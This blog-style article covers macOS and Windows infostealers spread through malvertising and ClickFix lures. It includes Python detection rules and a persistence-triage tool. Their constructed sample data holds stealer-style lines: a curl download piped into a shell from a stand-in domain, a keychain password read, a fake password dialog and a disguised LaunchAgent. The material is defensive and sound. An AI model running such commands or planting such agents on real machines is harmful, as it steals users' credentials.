Infostealers without borders: macOS and Windows targeted by Python-based malware and malvertising

Published · 5 min read · 137 reads

In recent months, threat response teams have seen a shift: credential- and secret-stealing campaigns are no longer an exclusively Windows problem and are now thriving on macOS. According to Microsoft's security research team, attackers are exploiting cross-platform languages such as Python and trusted distribution channels to infect Apple users with fraudulent installers and techniques that evade traditional detection.

The entry point is usually a well-polished piece of social engineering. Malicious ads and pages built to look like legitimate download sites lead victims searching for popular tools (AI-related utilities or libraries, for example) to DMG installers that, when run, deploy macOS-specific infostealer families. Microsoft documents campaigns that use ClickFix-style lures, a technique that tricks the user into copying and pasting commands or installing what they believe is a fix or a useful tool; the result is that the user infects their own machine with malware capable of exfiltrating passwords, cookies and other secrets.


The names appearing in the reports include families such as Atomic macOS Stealer (AMOS), MacSync and DigitStealer. In other cases, the same Python-based tooling makes it easy to reuse and adapt code across multiple operating systems, accelerating the spread of these attacks to heterogeneous environments. Microsoft explains these observations in more detail in its technical analysis: Infostealers without borders.

The attackers' technique is not limited to installing a malicious binary: many campaigns use fileless execution, rely on native macOS utilities and AppleScript to automate malicious tasks, and manipulate the system to collect sensitive information such as browser-saved credentials, session data and iCloud Keychain items. The risk is not only the loss of personal passwords; development secrets and tokens that grant access to internal infrastructure are also at stake, which can lead to major intrusions, business email compromise (BEC), supply chain attacks, or even extortion and ransomware.

Mass distribution often runs through malvertising and SEO poisoning: campaigns that pay for ads or manipulate search results to redirect users to cloned pages of popular tools. Google Ads and other ad platforms have been cited as vectors that, without further scrutiny by the user, can lead to apparently legitimate downloads. To understand how malicious ads and ad-inventory quality practices play into this, read Google's policies and recommendations on malicious content: Google Ads policies.

The campaigns have also shown geographical and operational variation: for example, researchers have linked certain Python-written stealers to Vietnamese-speaking actors and have documented the use of messaging services such as Telegram to relay commands and exfiltrate data. In other incidents, WhatsApp has been used to spread malicious links leading to deceptive installers, as reported by incident response teams in public analyses of these malware families.

What can an individual or an organization do to protect themselves? First, distrust installers that appear behind ad clicks or on sites that mimic well-known tools. On macOS, respecting the native security controls (such as Gatekeeper) and installing software only from verified developers or from the App Store reduces the attack surface. Apple maintains documentation on iCloud Keychain and its security measures that is worth reviewing: What is iCloud Keychain?. In addition, keeping the operating system and security signatures up to date, and using password managers and multi-factor authentication, limits the damage if a credential is compromised.

From a detection standpoint, security teams should watch for atypical behaviour in Terminal, unexplained AppleScript (osascript) executions, Keychain access by unexpected processes, and outbound traffic such as POST requests to newly registered or otherwise suspicious domains. Monitoring egress and correlating it with malicious-domain intelligence feeds helps identify leaks before they become major incidents. It is also useful to review the guidance on phishing response and credential-theft techniques published by national security agencies, such as the NCSC's: Tips on phishing.
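The behaviours listed above translate directly into detection rules. The following is an added example written for this article, not Microsoft's or any vendor's detection logic: it runs four rules over a handful of EDR-style events (paste-and-run shell chains of the kind a ClickFix lure asks the victim to type, inline AppleScript from a non-interactive parent, Keychain reads by unexpected processes, and POSTs to newly registered domains). The event schema, the allowlists, the `.example` lure domain and the domain-registration table are all assumptions constructed here; in practice the events come from your EDR and the registration dates from a domain-intelligence feed.

```python
"""Behavioural detection for macOS infostealer tradecraft (added example).

Rules: paste-and-run shell chains, inline AppleScript, Keychain reads by
unexpected processes, POSTs to newly registered domains. Event schema,
allowlists and the domain table are assumptions constructed for this example."""

import re
import shlex
from datetime import date

# Parents from which an interactive osascript or `security` call is expected
# (assumption; tune to the fleet). A stealer's osascript usually hangs off a
# shell, python or installer process instead.
INTERACTIVE_PARENTS = {"Terminal", "iTerm2", "Script Editor"}

# Processes that legitimately open the login keychain file (assumption).
EXPECTED_KEYCHAIN_READERS = {"securityd", "Safari", "Keychain Access", "loginwindow"}

# Constructed stand-in for a domain-intelligence feed: registration dates.
DOMAIN_REGISTERED = {
    "update.apple.com": date(1997, 2, 19),
    "ai-tools-download.example": date(2025, 11, 28),  # constructed lure domain
}
NEW_DOMAIN_DAYS = 30
SAMPLE_TODAY = date(2025, 12, 15)  # fixed "now" so the example is deterministic

# `security` subcommands that read secrets out of a keychain.
KEYCHAIN_CLI = re.compile(r"\bsecurity\s+(find-(generic|internet)-password|dump-keychain)\b")
# A download piped straight into a shell, or $(curl ...) handed to `sh -c`:
# the shape of the command a ClickFix lure asks the victim to paste.
PASTE_AND_RUN = re.compile(
    r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"
    r"|\b(ba|z)?sh\s+-c\s+[\"']?\$\((curl|wget)\b")


def _argv(cmdline):
    """Split a command line like a shell would; fall back on unbalanced quotes."""
    try:
        return shlex.split(cmdline)
    except ValueError:
        return cmdline.split()


def analyze(events, today):
    """Run each rule over EDR-style event dicts; return (rule, event id) pairs."""
    alerts = []
    for ev in events:
        if ev["type"] == "process":
            argv = _argv(ev["cmdline"])
            exe = argv[0].rsplit("/", 1)[-1] if argv else ""
            unexpected_parent = ev["parent"] not in INTERACTIVE_PARENTS
            # Inline AppleScript (-e) from a non-interactive parent: the usual
            # shape of a fake password prompt or an automated collection step.
            if exe == "osascript" and "-e" in argv and unexpected_parent:
                alerts.append(("inline_applescript", ev["id"]))
            if KEYCHAIN_CLI.search(ev["cmdline"]) and unexpected_parent:
                alerts.append(("keychain_cli", ev["id"]))
            # Fires even under Terminal: that is exactly where the victim pastes it.
            if PASTE_AND_RUN.search(ev["cmdline"]):
                alerts.append(("paste_and_run", ev["id"]))
        elif ev["type"] == "file":
            if "Library/Keychains/" in ev["path"] and ev["process"] not in EXPECTED_KEYCHAIN_READERS:
                alerts.append(("keychain_file_read", ev["id"]))
        elif ev["type"] == "network" and ev["method"] == "POST":
            registered = DOMAIN_REGISTERED.get(ev["domain"])
            if registered is not None and (today - registered).days < NEW_DOMAIN_DAYS:
                alerts.append(("post_to_new_domain", ev["id"]))
    return alerts


# Constructed telemetry: events 1-5 are an infection chain, 6-8 are benign noise.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "parent": "Terminal", "process": "bash",
     "cmdline": 'bash -c "$(curl -fsSL https://ai-tools-download.example/fix.sh)"'},
    {"id": 2, "type": "process", "parent": "bash", "process": "osascript",
     "cmdline": "osascript -e 'display dialog \"System needs your password\" default answer \"\" with hidden answer'"},
    {"id": 3, "type": "process", "parent": "bash", "process": "security",
     "cmdline": "security find-generic-password -ga Chrome -w"},
    {"id": 4, "type": "file", "process": "python3",
     "path": "/Users/ana/Library/Keychains/login.keychain-db"},
    {"id": 5, "type": "network", "process": "python3", "method": "POST",
     "domain": "ai-tools-download.example"},
    {"id": 6, "type": "process", "parent": "Script Editor", "process": "osascript",
     "cmdline": "osascript /Users/ana/Scripts/backup.scpt"},
    {"id": 7, "type": "file", "process": "Safari",
     "path": "/Users/ana/Library/Keychains/login.keychain-db"},
    {"id": 8, "type": "network", "process": "softwareupdated", "method": "POST",
     "domain": "update.apple.com"},
]

if __name__ == "__main__":
    for rule, event_id in analyze(SAMPLE_EVENTS, SAMPLE_TODAY):
        print(f"ALERT {rule:<20} event {event_id}")
```

Each alert on its own is weak (an administrator also runs `security find-generic-password`), which is why the rules key on the parent process and why the five hits above are worth correlating as one chain: a pasted download, a password prompt from a shell, a keychain read and an upload to a days-old domain within minutes of each other.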

In mixed environments, where macOS and Windows coexist, attackers use the same infection chains to deploy stealers on each platform. On Windows it is common to see persistence through registry Run keys or scheduled tasks; on macOS, persistence may try to hide behind LaunchAgents or cron jobs. Effective protection therefore combines prevention, detection and rapid response: continuous user training on social engineering, technical controls that restrict execution of unauthorized software, and network rules that block the domains and services used by malicious actors.
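A practical way to act on the macOS half of that paragraph is to triage the user's own persistence locations. The following is an added example for this article, not Microsoft's or any vendor's tooling: it parses LaunchAgent plists of the kind found in ~/Library/LaunchAgents and a `crontab -l` dump, and reports why an entry deserves a closer look. The two plists and the crontab are constructed inline so the code runs offline, and the heuristics (an Apple-looking label in a user LaunchAgent, interpreter payloads, hidden or world-writable staging paths, a download piped into a shell) are this example's own assumptions rather than a published ruleset.

```python
"""Triage of user-level macOS persistence: LaunchAgents and crontab (added example).

The plists, the crontab and the heuristics are constructed for this example."""

import os
import plistlib
import re

INTERPRETERS = {"osascript", "python", "python3", "sh", "bash", "zsh", "curl", "wget"}
STAGING_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b")


def triage_launchagent(data):
    """Return the reasons a plist from ~/Library/LaunchAgents looks suspicious ([] if clean)."""
    plist = plistlib.loads(data)
    args = plist.get("ProgramArguments") or [plist.get("Program", "")]
    tokens = [tok for arg in args for tok in arg.split()]
    reasons = []
    label = plist.get("Label", "")
    # Apple's own agents live in /System/Library/LaunchAgents, so an
    # Apple-looking label in the user's directory is camouflage.
    if label.startswith("com.apple."):
        reasons.append(f"Apple-like label {label!r} in a user LaunchAgent")
    interps = sorted({os.path.basename(t) for t in tokens} & INTERPRETERS)
    if interps:
        reasons.append("runs interpreter(s): " + ", ".join(interps))
    staged = [t for t in tokens if t.startswith(STAGING_PREFIXES) or "/." in t]
    if staged:
        reasons.append("payload in hidden or world-writable path: " + ", ".join(staged))
    # Only an amplifier: RunAtLoad/KeepAlive alone is normal for vendor agents.
    if reasons and (plist.get("RunAtLoad") or plist.get("KeepAlive")):
        reasons.append("RunAtLoad/KeepAlive set: starts at login and is restarted if killed")
    return reasons


def triage_crontab(text):
    """Return (schedule, command, reason) for suspicious entries in a crontab dump."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):                 # @daily, @reboot, ...
            parts = line.split(None, 1)
        else:                                    # five time fields, then the command
            parts = line.split(None, 5)
            if len(parts) == 6:
                parts = [" ".join(parts[:5]), parts[5]]
        if len(parts) != 2:
            continue
        schedule, command = parts
        if PIPE_TO_SHELL.search(command):
            findings.append((schedule, command, "downloads and pipes into a shell"))
        elif any(os.path.basename(tok) in INTERPRETERS for tok in command.split()):
            findings.append((schedule, command, "invokes an interpreter"))
    return findings


# Constructed samples: a plausible vendor updater and a stealer-style agent.
SAMPLE_LAUNCHAGENTS = {
    "com.example.updater.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key>
  <array><string>/Applications/Example.app/Contents/MacOS/updater</string><string>--check</string></array>
  <key>StartInterval</key><integer>3600</integer>
</dict></plist>""",
    "com.apple.softwareupdate.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.softwareupdate</string>
  <key>ProgramArguments</key>
  <array><string>/bin/sh</string><string>-c</string>
         <string>/usr/bin/osascript /Users/Shared/.update/agent.scpt</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>""",
}
SAMPLE_CRONTAB = """# constructed `crontab -l` output
0 3 * * * /usr/local/bin/backup.sh
*/10 * * * * curl -fsSL https://ai-tools-download.example/p.sh | sh
"""

if __name__ == "__main__":
    for name, data in SAMPLE_LAUNCHAGENTS.items():
        print(name, "->", triage_launchagent(data) or "clean")
    for schedule, command, reason in triage_crontab(SAMPLE_CRONTAB):
        print(f"cron [{schedule}] {command!r}: {reason}")
```

On a real host the same functions would be fed every file under ~/Library/LaunchAgents and /Library/LaunchAgents plus the output of `crontab -l` for each user; the "invokes an interpreter" finding is deliberately noisy and meant for analyst review, while the Apple-like label and hidden-path findings are the ones worth alerting on.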


Researchers warn that the growth of such attacks, driven by reusable languages such as Python and the abuse of legitimate distribution channels, makes the threat fast-evolving. For security leaders and managers it is essential to maintain application control policies, apply network segmentation, require strong authentication, and regularly review access to secrets and code repositories. Transparency in incident reporting and the sharing of indicators of compromise between organizations speed up the collective response to these campaigns.

In short, the combination of malvertising, fake installers and cross-platform stealers is a reminder that security does not depend on the operating system alone. Prevention requires a trained human layer, up-to-date defensive tooling, and network and endpoint controls that detect abnormal behaviour before attackers walk off with valuable information.

To read further and consult the original Microsoft analysis, the technical report is available here: Microsoft Security Blog. For practical guidance on avoiding phishing and credential exfiltration, the NCSC resource collection is very useful: NCSC - Phishing. And to review the policies and recommendations on malicious ads and practices on advertising platforms, see the Google Ads documentation: Google Ads policy.
